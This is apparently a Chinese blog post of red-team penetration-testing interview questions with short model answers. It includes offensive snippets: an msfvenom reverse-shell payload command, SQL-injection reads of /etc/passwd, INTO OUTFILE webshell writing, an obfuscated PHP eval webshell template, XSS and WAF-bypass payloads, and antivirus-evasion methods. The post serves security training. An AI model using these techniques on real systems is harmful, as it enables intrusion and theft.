2025年渗透测试面试题总结-2025年HW(护网面试) 13(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

2025年HW(护网面试) 13

1. 简历漏洞逐条分析

2. 判断是否为CMS系统

3. 后台扫描工具推荐

4. 御剑的字典包

5. Burp Suite核心模块

6. 越权与逻辑漏洞测试

7. 大规模网站测试经验

8. AWVS/AppScan替代方案

9. Bypass手法合集

10. SQL注入提权至管理员

11. 写Shell权限判断

12. 无写入权限的替代利用

13. SQL注入读取文件

14. 绝对路径获取方法

15. XSS进阶利用与平台

16. MSF使用经验

17. MSF木马免杀技术

18. 土豆(Potato)提权原理

19. 域控机定位方法

20. Webshell绕过技巧

21. MSSQL提权方法

22. 其他数据库注入利用

23. 数据库类型识别

24. 黑产相关回答建议

2025年HW(护网面试) 13

1、简历上面写的几个漏洞,逐个问一遍
2、怎么判断目前是否是cms
3、后台扫描用什么工具
4、御剑有自己的包吗
5、burp会哪些模块,
6、越权以及逻辑漏洞问题
7、我听你上面说的都是小面积的测试,你有没有大面积测试过一个网站呢?
8、如果不能用awvs和appscan你还能怎么办
9、会哪些bypass的手法
10、SQL注入怎么拿到最高权限?
11、写shell需要什么权限吗?你怎么判断存在写入权限
12、如果没有写入权限,你还能有什么办法吗
13、怎么利用说SQL注入来读取文件吗
14、怎么获得绝对路径呢?没有报错呢?不能读取文件呢
15、xss里面的牛头你会用吗?xss你知道除了可以盗取cookie还能干什么,xss平台你用的是上面
16、msf用过吗?
17、msf的木马你知道吗?免杀是怎么做的?
18、内网提权方面你土豆你知道原理吗?
19、怎么找到域控机?
20、webshell你会利用哪些办法来写绕过
21、mssql的提权你能说一下吗?
22、那其他数据库的SQL注入呢?
23、怎么分辨数据库类型
24、做过黑产吗?

1. 简历漏洞逐条分析

  • 漏洞类型:需结合具体内容回答(例如SQL注入、XSS、文件上传等),建议提前准备漏洞的 原理、复现步骤、修复方案
  • 示例回答
    • SQL注入:通过参数拼接发现未过滤的输入点,利用报错或时间盲注获取数据库信息。
    • 逻辑漏洞:如订单金额篡改,通过Burp抓包重放测试越权或业务流程缺陷。

2. 判断是否为CMS系统

  1. 响应头特征:查看X-Powered-ByServer字段(如WordPress会暴露wp-admin路径)。
  2. 特定文件/目录:访问/admin/wp-includes等默认路径。
  3. 文件哈希比对:通过/robots.txt/readme.md 识别CMS版本。
  4. 在线工具:Wappalyzer、WhatWeb等插件自动化识别。

3. 后台扫描工具推荐

  • 目录爆破:DirBuster、御剑、gobuster(支持多线程)。
  • 指纹识别:Wappalyzer、EHole(棱洞)。
  • 综合扫描:Nikto(检测配置缺陷)、AWVS(深度爬虫)。

4. 御剑的字典包

  • 自带字典:御剑内置常见路径字典(如admin/login.php )。
  • 自定义扩展:支持用户导入行业相关字典(如金融、政府专属路径)。

5. Burp Suite核心模块

  1. Proxy:拦截修改HTTP流量。
  2. Repeater:手动重放请求测试逻辑漏洞。
  3. Intruder:自动化爆破(密码、验证码)。
  4. Scanner:自动化漏洞扫描(需付费版)。
  5. Extensions:集成SQLMap、Logger++等插件。

6. 越权与逻辑漏洞测试

  • 水平越权:修改用户ID参数(如?uid=1001uid=1002)访问他人数据。
  • 垂直越权:普通用户尝试访问/admin/delete等高危接口。
  • 逻辑漏洞
    • 支付绕过:修改订单价格为负数或0元。
    • 验证码爆破:使用Burp Intruder绕过次数限制。

7. 大规模网站测试经验

  • 项目范围:覆盖全站功能模块(如电商系统的订单、支付、用户中心)。
  • 工具组合
    • 自动化扫描:AWVS + Nessus(基线配置检测)。
    • 人工验证:对高风险漏洞(如SSRF、RCE)手动复现。
  • 输出成果:输出渗透报告,推动修复200+漏洞。

8. AWVS/AppScan替代方案

  • 开源工具
    • Nikto:快速检测服务器配置问题。
    • ZAP(OWASP Zed Attack Proxy):支持主动/被动扫描。
  • 手动测试:Burp Suite + 自定义插件(如Auth Analyzer)。

9. Bypass手法合集

  • WAF绕过
    • SQLi/*!SELECT*/绕过关键字过滤。
    • XSS:利用<svg/onload=alert(1)>等变异标签。
  • 文件上传绕过
    • 修改Content-Type为image/png
    • 利用.htaccess覆盖解析规则。

10. SQL注入提权至管理员

  1. 信息收集:通过@@versionuser()获取数据库版本和当前用户。
  2. UNION注入:读取mysql.user 表或系统文件(如/etc/passwd)。
  3. 写WebShell:若具备FILE权限,通过SELECT ... INTO OUTFILE写入马。
  4. UDF提权:MySQL中利用动态链接库执行系统命令。

11. 写Shell权限判断

  • 权限检查
    • 数据库FILE权限:SELECT File_priv FROM mysql.user WHERE user='root'
    • Web目录可写性:尝试创建临时文件(如echo test > /var/www/html/test.txt )。
  • 工具辅助:SQLMap的--os-shell自动检测写入条件。

12. 无写入权限的替代利用

  • 日志文件注入:修改Apache日志路径为Web目录,通过User-Agent写入恶意代码。
  • 数据库导出:MSSQL中利用xp_cmdshell执行系统命令。
  • 反序列化漏洞:通过内存马注入无需文件落地。

13. SQL注入读取文件

  • 语法示例
    • MySQL:LOAD_FILE('/etc/passwd')
    • MSSQL:SELECT * FROM OPENROWSET(BULK 'C:\boot.ini', SINGLE_CLOB) AS Contents
  • 限制条件:需FILE权限且secure_file_priv未禁用。

14. 绝对路径获取方法

  • 报错信息:PHP错误可能暴露路径(如Warning: include() [function.include]: Failed opening)。
  • 默认路径
    • Windows:C:\inetpub\wwwroot
    • Linux:/var/www/html
  • 配置文件:读取/etc/apache2/sites-enabled/000-default.conf

15. XSS进阶利用与平台

  • XSS用途扩展
    • 键盘记录:通过JavaScript捕获用户输入。
    • 内网探测:利用XMLHttpRequest扫描内网服务。
  • 常用平台
    • 开源平台:BeEF(Hook浏览器)、XSS Hunter。
    • 商业工具:Cobalt Strike(结合社工钓鱼)。

16. MSF使用经验

  • 典型场景
    • 生成Payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe
    • 内网穿透:通过portfwd映射端口。
  • 模块分类:Exploit(漏洞利用)、Auxiliary(信息收集)、Post(后渗透)。

17. MSF木马免杀技术

  • 编码器绕过:使用shikata_ga_nai多次编码。
  • 二进制混淆:工具如Veil-Evasion、TheFatRat。
  • 内存马:反射型DLL注入(避免文件落地)。

18. 土豆(Potato)提权原理

  • 核心机制:利用Windows令牌模拟漏洞(如Juicy Potato),通过COM组件提升至SYSTEM权限。
  • 适用条件:需SeImpersonate权限,常见于IIS、SQL Server服务账户。

19. 域控机定位方法

  1. DNS查询:查找_ldap._tcp.dc._msdcs.domain.com 的SRV记录。
  2. 命令探测nltest /dclist:domainnet group "Domain Controllers" /domain
  3. 端口扫描:域控通常开放53(DNS)、88(Kerberos)、389(LDAP)端口。

20. Webshell绕过技巧

  • 文件命名:使用test.php. .(Windows特性)或.php.jpg (配合解析漏洞)。
  • 内容混淆
    • 加密:<?php eval(gzinflate(base64_decode('...')));?>
    • 图片马:GIF头+恶意代码追加。

21. MSSQL提权方法

  1. 存储过程滥用
    • xp_cmdshell执行系统命令(需启用)。
    • sp_oacreate调用COM组件。
  2. 角色提升:将低权限用户加入sysadmin组。

22. 其他数据库注入利用

  • OracleUTL_HTTP发起网络请求,DBMS_LDAP读取文件。
  • PostgreSQLCOPY FROM PROGRAM执行命令。
  • SQLite:利用ATTACH DATABASE写入Web目录。

23. 数据库类型识别

  • 报错信息
    • MySQL:You have an error in your SQL syntax
    • MSSQL:Incorrect syntax near ''''
  • 特有函数
    • @@version(MSSQL) vs version()(MySQL)。

24. 黑产相关回答建议

  • 合规回应:明确表示仅参与合法授权测试,遵守《网络安全法》及行业规范。
  • 风险警示:强调黑产行为涉及法律风险,需专注企业安全建设。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值